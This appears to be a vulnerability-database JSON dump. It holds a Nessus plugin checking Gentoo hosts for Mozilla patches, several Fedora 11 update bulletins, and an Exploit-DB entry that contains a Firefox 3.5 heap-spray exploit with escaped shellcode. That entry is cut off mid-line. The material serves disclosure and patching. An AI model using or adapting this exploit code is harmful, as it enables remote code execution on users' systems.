\"CVE-2010-0168\", \"CVE-2010-0169\", \"CVE-2010-0170\", \"CVE-2010-0171\", \"CVE-2010-0172\", \"CVE-2010-0173\", \"CVE-2010-0174\", \"CVE-2010-0175\", \"CVE-2010-0176\", \"CVE-2010-0177\", \"CVE-2010-0178\", \"CVE-2010-0179\", \"CVE-2010-0181\", \"CVE-2010-0182\", \"CVE-2010-0183\", \"CVE-2010-0220\", \"CVE-2010-0648\", \"CVE-2010-0654\", \"CVE-2010-1028\", \"CVE-2010-1121\", \"CVE-2010-1125\", \"CVE-2010-1196\", \"CVE-2010-1197\", \"CVE-2010-1198\", \"CVE-2010-1199\", \"CVE-2010-1200\", \"CVE-2010-1201\", \"CVE-2010-1202\", \"CVE-2010-1203\", \"CVE-2010-1205\", \"CVE-2010-1206\", \"CVE-2010-1207\", \"CVE-2010-1208\", \"CVE-2010-1209\", \"CVE-2010-1210\", \"CVE-2010-1211\", \"CVE-2010-1212\", \"CVE-2010-1213\", \"CVE-2010-1214\", \"CVE-2010-1215\", \"CVE-2010-1585\", \"CVE-2010-2751\", \"CVE-2010-2752\", \"CVE-2010-2753\", \"CVE-2010-2754\", \"CVE-2010-2755\", \"CVE-2010-2760\", \"CVE-2010-2762\", \"CVE-2010-2763\", \"CVE-2010-2764\", \"CVE-2010-2765\", \"CVE-2010-2766\", \"CVE-2010-2767\", \"CVE-2010-2768\", \"CVE-2010-2769\", \"CVE-2010-2770\", \"CVE-2010-3131\", \"CVE-2010-3166\", \"CVE-2010-3167\", \"CVE-2010-3168\", \"CVE-2010-3169\", \"CVE-2010-3170\", \"CVE-2010-3171\", \"CVE-2010-3173\", \"CVE-2010-3174\", \"CVE-2010-3175\", \"CVE-2010-3176\", \"CVE-2010-3177\", \"CVE-2010-3178\", \"CVE-2010-3179\", \"CVE-2010-3180\", \"CVE-2010-3182\", \"CVE-2010-3183\", \"CVE-2010-3399\", \"CVE-2010-3400\", \"CVE-2010-3765\", \"CVE-2010-3766\", \"CVE-2010-3767\", \"CVE-2010-3768\", \"CVE-2010-3769\", \"CVE-2010-3770\", \"CVE-2010-3771\", \"CVE-2010-3772\", \"CVE-2010-3773\", \"CVE-2010-3774\", \"CVE-2010-3775\", \"CVE-2010-3776\", \"CVE-2010-3777\", \"CVE-2010-3778\", \"CVE-2010-4508\", \"CVE-2010-5074\", \"CVE-2011-0051\", \"CVE-2011-0053\", \"CVE-2011-0054\", \"CVE-2011-0055\", \"CVE-2011-0056\", \"CVE-2011-0057\", \"CVE-2011-0058\", \"CVE-2011-0059\", \"CVE-2011-0061\", \"CVE-2011-0062\", \"CVE-2011-0065\", \"CVE-2011-0066\", \"CVE-2011-0067\", \"CVE-2011-0068\", \"CVE-2011-0069\", \"CVE-2011-0070\", \"CVE-2011-0071\", \"CVE-2011-0072\", \"CVE-2011-0073\", \"CVE-2011-0074\", \"CVE-2011-0075\", \"CVE-2011-0076\", \"CVE-2011-0077\", \"CVE-2011-0078\", \"CVE-2011-0079\", \"CVE-2011-0080\", \"CVE-2011-0081\", \"CVE-2011-0082\", \"CVE-2011-0083\", \"CVE-2011-0084\", \"CVE-2011-0085\", \"CVE-2011-1187\", \"CVE-2011-1202\", \"CVE-2011-1712\", \"CVE-2011-2362\", \"CVE-2011-2363\", \"CVE-2011-2364\", \"CVE-2011-2365\", \"CVE-2011-2369\", \"CVE-2011-2370\", \"CVE-2011-2371\", \"CVE-2011-2372\", \"CVE-2011-2373\", \"CVE-2011-2374\", \"CVE-2011-2375\", \"CVE-2011-2376\", \"CVE-2011-2377\", \"CVE-2011-2378\", \"CVE-2011-2605\", \"CVE-2011-2980\", \"CVE-2011-2981\", \"CVE-2011-2982\", \"CVE-2011-2983\", \"CVE-2011-2984\", \"CVE-2011-2985\", \"CVE-2011-2986\", \"CVE-2011-2987\", \"CVE-2011-2988\", \"CVE-2011-2989\", \"CVE-2011-2990\", \"CVE-2011-2991\", \"CVE-2011-2993\", \"CVE-2011-2995\", \"CVE-2011-2996\", \"CVE-2011-2997\", \"CVE-2011-2998\", \"CVE-2011-2999\", \"CVE-2011-3000\", \"CVE-2011-3001\", \"CVE-2011-3002\", \"CVE-2011-3003\", \"CVE-2011-3004\", \"CVE-2011-3005\", \"CVE-2011-3026\", \"CVE-2011-3062\", \"CVE-2011-3101\", \"CVE-2011-3232\", \"CVE-2011-3389\", \"CVE-2011-3640\", \"CVE-2011-3647\", \"CVE-2011-3648\", \"CVE-2011-3649\", \"CVE-2011-3650\", \"CVE-2011-3651\", \"CVE-2011-3652\", \"CVE-2011-3653\", \"CVE-2011-3654\", \"CVE-2011-3655\", \"CVE-2011-3658\", \"CVE-2011-3659\", \"CVE-2011-3660\", \"CVE-2011-3661\", \"CVE-2011-3663\", \"CVE-2011-3665\", \"CVE-2011-3670\", \"CVE-2011-3866\", \"CVE-2011-4688\", \"CVE-2012-0441\", \"CVE-2012-0442\", \"CVE-2012-0443\", \"CVE-2012-0444\", \"CVE-2012-0445\", \"CVE-2012-0446\", \"CVE-2012-0447\", \"CVE-2012-0449\", \"CVE-2012-0450\", \"CVE-2012-0451\", \"CVE-2012-0452\", \"CVE-2012-0455\", \"CVE-2012-0456\", \"CVE-2012-0457\", \"CVE-2012-0458\", \"CVE-2012-0459\", \"CVE-2012-0460\", \"CVE-2012-0461\", \"CVE-2012-0462\", \"CVE-2012-0463\", \"CVE-2012-0464\", \"CVE-2012-0467\", \"CVE-2012-0468\", \"CVE-2012-0469\", \"CVE-2012-0470\", \"CVE-2012-0471\", \"CVE-2012-0473\", \"CVE-2012-0474\", \"CVE-2012-0475\", \"CVE-2012-0477\", \"CVE-2012-0478\", \"CVE-2012-0479\", \"CVE-2012-1937\", \"CVE-2012-1938\", \"CVE-2012-1939\", \"CVE-2012-1940\", \"CVE-2012-1941\", \"CVE-2012-1945\", \"CVE-2012-1946\", \"CVE-2012-1947\", \"CVE-2012-1948\", \"CVE-2012-1949\", \"CVE-2012-1950\", \"CVE-2012-1951\", \"CVE-2012-1952\", \"CVE-2012-1953\", \"CVE-2012-1954\", \"CVE-2012-1955\", \"CVE-2012-1956\", \"CVE-2012-1957\", \"CVE-2012-1958\", \"CVE-2012-1959\", \"CVE-2012-1960\", \"CVE-2012-1961\", \"CVE-2012-1962\", \"CVE-2012-1963\", \"CVE-2012-1964\", \"CVE-2012-1965\", \"CVE-2012-1966\", \"CVE-2012-1967\", \"CVE-2012-1970\", \"CVE-2012-1971\", \"CVE-2012-1972\", \"CVE-2012-1973\", \"CVE-2012-1974\", \"CVE-2012-1975\", \"CVE-2012-1976\", \"CVE-2012-1994\", \"CVE-2012-3956\", \"CVE-2012-3957\", \"CVE-2012-3958\", \"CVE-2012-3959\", \"CVE-2012-3960\", \"CVE-2012-3961\", \"CVE-2012-3962\", \"CVE-2012-3963\", \"CVE-2012-3964\", \"CVE-2012-3965\", \"CVE-2012-3966\", \"CVE-2012-3967\", \"CVE-2012-3968\", \"CVE-2012-3969\", \"CVE-2012-3970\", \"CVE-2012-3971\", \"CVE-2012-3972\", \"CVE-2012-3973\", \"CVE-2012-3975\", \"CVE-2012-3976\", \"CVE-2012-3978\", \"CVE-2012-3980\", \"CVE-2012-3982\", \"CVE-2012-3984\", \"CVE-2012-3985\", \"CVE-2012-3986\", \"CVE-2012-3988\", \"CVE-2012-3989\", \"CVE-2012-3990\", \"CVE-2012-3991\", \"CVE-2012-3992\", \"CVE-2012-3993\", \"CVE-2012-3994\", \"CVE-2012-3995\", \"CVE-2012-4179\", \"CVE-2012-4180\", \"CVE-2012-4181\", \"CVE-2012-4182\", \"CVE-2012-4183\", \"CVE-2012-4184\", \"CVE-2012-4185\", \"CVE-2012-4186\", \"CVE-2012-4187\", \"CVE-2012-4188\", \"CVE-2012-4190\", \"CVE-2012-4191\", \"CVE-2012-4192\", \"CVE-2012-4193\", \"CVE-2012-4194\", \"CVE-2012-4195\", \"CVE-2012-4196\", \"CVE-2012-4201\", \"CVE-2012-4202\", \"CVE-2012-4204\", \"CVE-2012-4205\", \"CVE-2012-4206\", \"CVE-2012-4207\", \"CVE-2012-4208\", \"CVE-2012-4209\", \"CVE-2012-4210\", \"CVE-2012-4212\", \"CVE-2012-4215\", \"CVE-2012-4216\", \"CVE-2012-4930\", \"CVE-2012-5354\", \"CVE-2012-5829\", \"CVE-2012-5830\", \"CVE-2012-5833\", \"CVE-2012-5835\", \"CVE-2012-5836\", \"CVE-2012-5838\", \"CVE-2012-5839\", \"CVE-2012-5840\", \"CVE-2012-5841\", \"CVE-2012-5842\", \"CVE-2012-5843\");\n script_bugtraq_id(51752, 51753, 51754, 51756, 51757, 51765, 51787, 51975, 52456, 52457, 52458, 52459, 52460, 52461, 52463, 52464, 52465, 52466, 52467, 53219, 53220, 53221, 53223, 53224, 53225, 53227, 53228, 53229, 53230, 53231, 53315, 53791, 53792, 53793, 53794, 53796, 53797, 53798, 53799, 53800, 54572, 54573, 54574, 54575, 54576, 54577, 54578, 54579, 54580, 54581, 54582, 54583, 54584, 54585, 54586, 55257, 55260, 55264, 55266, 55274, 55276, 55277, 55278, 55292, 55304, 55306, 55308, 55310, 55311, 55313, 55314, 55316, 55317, 55318, 55319, 55320, 55321, 55322, 55323, 55324, 55325, 55340, 55342, 55857, 55922, 55924, 55926, 55927, 55930, 55931, 55932, 56118, 56119, 56120, 56121, 56123, 56125, 56126, 56127, 56128, 56129, 56130, 56131, 56135, 56136, 56140, 56151, 56153, 56154, 56155, 56301, 56302, 56306, 56611, 56612, 56613, 56614, 56616, 56618, 56621, 56625, 56627, 56629, 56630, 56631, 56632, 56633, 56634, 56635, 56636, 56637, 56641, 56642, 56643, 56644, 56646);\n script_xref(name:\"GLSA\", value:\"201301-01\");\n\n script_name(english:\"GLSA-201301-01 : Mozilla Products: Multiple vulnerabilities (BEAST)\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is affected by the vulnerability described in GLSA-201301-01\n(Mozilla Products: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Mozilla Firefox,\n Thunderbird, SeaMonkey, NSS, GNU IceCat, and XULRunner. Please review the\n CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could entice a user to view a specially crafted web\n page or email, possibly resulting in execution of arbitrary code or a\n Denial of Service condition. Furthermore, a remote attacker may be able\n to perform Man-in-the-Middle attacks, obtain sensitive information,\n bypass restrictions and protection mechanisms, force file downloads,\n conduct XML injection attacks, conduct XSS attacks, bypass the Same\n Origin Policy, spoof URL’s for phishing attacks, trigger a vertical\n scroll, spoof the location bar, spoof an SSL indicator, modify the\n browser’s font, conduct clickjacking attacks, or have other unspecified\n impact.\n A local attacker could gain escalated privileges, obtain sensitive\n information, or replace an arbitrary downloaded file.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n # https://blog.mozilla.org/security/2011/03/22/firefox-blocking-fraudulent-certificates/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a9b416a4\"\n );\n # https://www.mozilla.org/security/announce/2011/mfsa2011-11.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2011-11/\"\n );\n # https://www.mozilla.org/security/announce/2011/mfsa2011-34.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2011-34/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201301-01\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"All Mozilla Firefox users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-client/firefox-10.0.11'\n All users of the Mozilla Firefox binary package should upgrade to the\n latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-client/firefox-bin-10.0.11'\n All Mozilla Thunderbird users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=mail-client/thunderbird-10.0.11'\n All users of the Mozilla Thunderbird binary package should upgrade to\n the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=mail-client/thunderbird-bin-10.0.11'\n All Mozilla SeaMonkey users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-client/seamonkey-2.14-r1'\n All users of the Mozilla SeaMonkey binary package should upgrade to the\n latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-client/seamonkey-bin-2.14'\n All NSS users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-libs/nss-3.14'\n The “www-client/mozilla-firefox” package has been merged into the\n “www-client/firefox” package. To upgrade, please unmerge\n “www-client/mozilla-firefox” and then emerge the latest\n “www-client/firefox” package:\n # emerge --sync\n # emerge --unmerge 'www-client/mozilla-firefox'\n # emerge --ask --oneshot --verbose '>=www-client/firefox-10.0.11'\n The “www-client/mozilla-firefox-bin” package has been merged into\n the “www-client/firefox-bin” package. To upgrade, please unmerge\n “www-client/mozilla-firefox-bin” and then emerge the latest\n “www-client/firefox-bin” package:\n # emerge --sync\n # emerge --unmerge 'www-client/mozilla-firefox-bin'\n # emerge --ask --oneshot --verbose '>=www-client/firefox-bin-10.0.11'\n The “mail-client/mozilla-thunderbird” package has been merged into\n the “mail-client/thunderbird” package. To upgrade, please unmerge\n “mail-client/mozilla-thunderbird” and then emerge the latest\n “mail-client/thunderbird” package:\n # emerge --sync\n # emerge --unmerge 'mail-client/mozilla-thunderbird'\n # emerge --ask --oneshot --verbose '>=mail-client/thunderbird-10.0.11'\n The “mail-client/mozilla-thunderbird-bin” package has been merged\n into the “mail-client/thunderbird-bin” package. To upgrade, please\n unmerge “mail-client/mozilla-thunderbird-bin” and then emerge the\n latest “mail-client/thunderbird-bin” package:\n # emerge --sync\n # emerge --unmerge 'mail-client/mozilla-thunderbird-bin'\n # emerge --ask --oneshot --verbose\n '>=mail-client/thunderbird-bin-10.0.11'\n Gentoo discontinued support for GNU IceCat. We recommend that users\n unmerge GNU IceCat:\n # emerge --unmerge 'www-client/icecat'\n Gentoo discontinued support for XULRunner. We recommend that users\n unmerge XULRunner:\n # emerge --unmerge 'net-libs/xulrunner'\n Gentoo discontinued support for the XULRunner binary package. We\n recommend that users unmerge XULRunner:\n # emerge --unmerge 'net-libs/xulrunner-bin'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-11-772\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox 5.0 - 15.0.1 __exposedProps__ XCS Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'White_Phosphorus');\n script_cwe_id(16, 20, 22, 59, 79, 94, 119, 189, 200, 264, 287, 310, 362, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:firefox-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:icecat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:mozilla-firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:mozilla-firefox-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:mozilla-thunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:mozilla-thunderbird-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:nss\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:seamonkey\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:seamonkey-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:thunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:thunderbird-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:xulrunner\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:xulrunner-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/05/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/08\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-libs/xulrunner-bin\", unaffected:make_list(), vulnerable:make_list(\"le 1.8.1.19\"))) flag++;\nif (qpkg_check(package:\"mail-client/thunderbird-bin\", unaffected:make_list(\"ge 10.0.11\"), vulnerable:make_list(\"lt 10.0.11\"))) flag++;\nif (qpkg_check(package:\"www-client/firefox\", unaffected:make_list(\"ge 10.0.11\"), vulnerable:make_list(\"lt 10.0.11\"))) flag++;\nif (qpkg_check(package:\"mail-client/thunderbird\", unaffected:make_list(\"ge 10.0.11\"), vulnerable:make_list(\"lt 10.0.11\"))) flag++;\nif (qpkg_check(package:\"mail-client/mozilla-thunderbird-bin\", unaffected:make_list(), vulnerable:make_list(\"le 3.0\"))) flag++;\nif (qpkg_check(package:\"mail-client/mozilla-thunderbird\", unaffected:make_list(), vulnerable:make_list(\"le 3.0.4-r1\"))) flag++;\nif (qpkg_check(package:\"dev-libs/nss\", unaffected:make_list(\"ge 3.14\"), vulnerable:make_list(\"lt 3.14\"))) flag++;\nif (qpkg_check(package:\"www-client/firefox-bin\", unaffected:make_list(\"ge 10.0.11\"), vulnerable:make_list(\"lt 10.0.11\"))) flag++;\nif (qpkg_check(package:\"net-libs/xulrunner\", unaffected:make_list(), vulnerable:make_list(\"le 2.0-r1\"))) flag++;\nif (qpkg_check(package:\"www-client/mozilla-firefox-bin\", unaffected:make_list(), vulnerable:make_list(\"le 3.5.6\"))) flag++;\nif (qpkg_check(package:\"www-client/seamonkey\", unaffected:make_list(\"ge 2.14-r1\"), vulnerable:make_list(\"lt 2.14-r1\"))) flag++;\nif (qpkg_check(package:\"www-client/icecat\", unaffected:make_list(), vulnerable:make_list(\"le 10.0-r1\"))) flag++;\nif (qpkg_check(package:\"www-client/seamonkey-bin\", unaffected:make_list(\"ge 2.14\"), vulnerable:make_list(\"lt 2.14\"))) flag++;\nif (qpkg_check(package:\"www-client/mozilla-firefox\", unaffected:make_list(), vulnerable:make_list(\"le 3.6.8\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Mozilla Products\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2477", "CVE-2009-2478", "CVE-2009-2479"], "description": "gnome-web-photo contains a thumbnailer that will be used by GNOME applicati ons, including the file manager, to generate screenshots of web pages. ", "modified": "2009-07-22T22:03:48", "published": "2009-07-22T22:03:48", "id": "FEDORA:9228A10F91B", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 11 Update: gnome-web-photo-0.7-4.fc11", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2477", "CVE-2009-2478", "CVE-2009-2479"], "description": "The Eclipse platform is designed for building integrated development environments (IDEs), server-side applications, desktop applications, and everything in between. ", "modified": "2009-07-22T22:03:48", "published": "2009-07-22T22:03:48", "id": "FEDORA:81F3A10F905", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 11 Update: eclipse-3.4.2-13.fc11", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2477", "CVE-2009-2478", "CVE-2009-2479"], "description": "XULRunner provides the XUL Runtime environment for Gecko applications. ", "modified": "2009-07-22T22:03:48", "published": "2009-07-22T22:03:48", "id": "FEDORA:7315B10F8A9", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 11 Update: xulrunner-1.9.1.1-1.fc11", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2477", "CVE-2009-2478", "CVE-2009-2479"], "description": "Galeon is a web browser built around Gecko (Mozilla's rendering engine) and Necko (Mozilla's networking engine). It's a GNOME web browser, designed to take advantage of as many GNOME technologies as makes sense. Galeon was written to do just one thing - browse the web. ", "modified": "2009-07-22T22:03:48", "published": "2009-07-22T22:03:48", "id": "FEDORA:8FA1D10F91A", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 11 Update: galeon-2.0.7-12.fc11", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2477", "CVE-2009-2478", "CVE-2009-2479"], "description": "The gnome-python-extra package contains the source packages for additional Python bindings for GNOME. It should be used together with gnome-python. ", "modified": "2009-07-22T22:03:48", "published": "2009-07-22T22:03:48", "id": "FEDORA:8F7D810F919", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 11 Update: gnome-python2-extras-2.25.3-5.fc11", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2477", "CVE-2009-2478", "CVE-2009-2479"], "description": "Epiphany Extensions is a collection of extensions for Epiphany, the GNOME web browser. ", "modified": "2009-07-22T22:03:48", "published": "2009-07-22T22:03:48", "id": "FEDORA:8C68810F918", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 11 Update: epiphany-extensions-2.26.1-4.fc11", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2477", "CVE-2009-2478", "CVE-2009-2479"], "description": "Epiphany is the web browser for the GNOME desktop. Its goal is to be simple and easy to use. Epiphany ties together many GNOME components in order to let you focus on the Web content, instead of the browser application. Epiphany is extensible through a plugin system. Existing plugins can be found in the epiphany-extensions package. ", "modified": "2009-07-22T22:03:48", "published": "2009-07-22T22:03:48", "id": "FEDORA:85DFA10F908", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 11 Update: epiphany-2.26.3-2.fc11", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2477", "CVE-2009-2478", "CVE-2009-2479"], "description": "The OpenJDK runtime environment. ", "modified": "2009-07-22T22:03:48", "published": "2009-07-22T22:03:48", "id": "FEDORA:9E30310F91E", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 11 Update: java-1.6.0-openjdk-1.6.0.0-25.b16.fc11", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2477", "CVE-2009-2478", "CVE-2009-2479"], "description": "Yelp is the help browser for the GNOME desktop. It is designed to help you browse all the documentation on your system in one central tool, including traditional man pages, info pages and documentation written in DocBook. ", "modified": "2009-07-22T22:03:48", "published": "2009-07-22T22:03:48", "id": "FEDORA:B841210F943", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 11 Update: yelp-2.26.0-5.fc11", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2477", "CVE-2009-2478", "CVE-2009-2479"], "description": "This module allows you to use the Mozilla embedding widget from Perl. ", "modified": "2009-07-22T22:03:48", "published": "2009-07-22T22:03:48", "id": "FEDORA:ADBF510F922", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 11 Update: perl-Gtk2-MozEmbed-0.08-6.fc11.3", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-01T09:57:09", "description": "Mozilla Firefox 3.5 (Font tags) Remote Buffer Overflow Exploit. CVE-2009-2477,CVE-2009-2478. Remote exploit for windows platform", "published": "2009-07-13T00:00:00", "type": "exploitdb", "title": "Mozilla Firefox 3.5 Font tags Remote Buffer Overflow Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2477", "CVE-2009-2478"], "modified": "2009-07-13T00:00:00", "id": "EDB-ID:9137", "href": "https://www.exploit-db.com/exploits/9137/", "sourceData": "<html>\r\n<head>\r\n<title>Firefox 3.5 Vulnerability</title>\r\nFirefox 3.5 Heap Spray Vulnerabilty\r\n</br>\r\nAuthor: SBerry aka Simon Berry-Byrne\r\n</br>\r\nThanks to HD Moore for the insight and Metasploit for the payload\r\n<div id=\"content\">\r\n<p>\r\n<FONT> \r\n</FONT>\r\n</p>\r\n<p>\r\n<FONT>Loremipsumdoloregkuw</FONT></p>\r\n<p>\r\n<FONT>Loremipsumdoloregkuwiert</FONT>\r\n</p>\r\n<p>\r\n<FONT>Loremikdkw </FONT>\r\n</p>\r\n</div>\r\n<script language=JavaScript>\r\n \r\n/* Calc.exe */\r\nvar shellcode = unescape(\"%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800\" + \r\n \"%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A\" + \r\n \"%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350\" + \r\n \"%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40\" + \r\n \"%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000\" + \r\n \"%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040\" + \r\n \"%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD\" + \r\n \"%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40\" + \r\n \"%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18\" + \r\n \"%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0\" + \r\n \"%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B\" + \r\n \"%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24\" + \r\n \"%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9\" + \r\n \"%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C\" + \r\n \"%u652E%u6578%u9000\");\r\n/* Heap Spray Code */ \r\noneblock = unescape(\"%u0c0c%u0c0c\");\r\nvar fullblock = oneblock;\r\nwhile (fullblock.length<0x60000) \r\n{\r\n fullblock += fullblock;\r\n}\r\nsprayContainer = new Array();\r\nfor (i=0; i<600; i++) \r\n{\r\n sprayContainer[i] = fullblock + shellcode;\r\n}\r\nvar 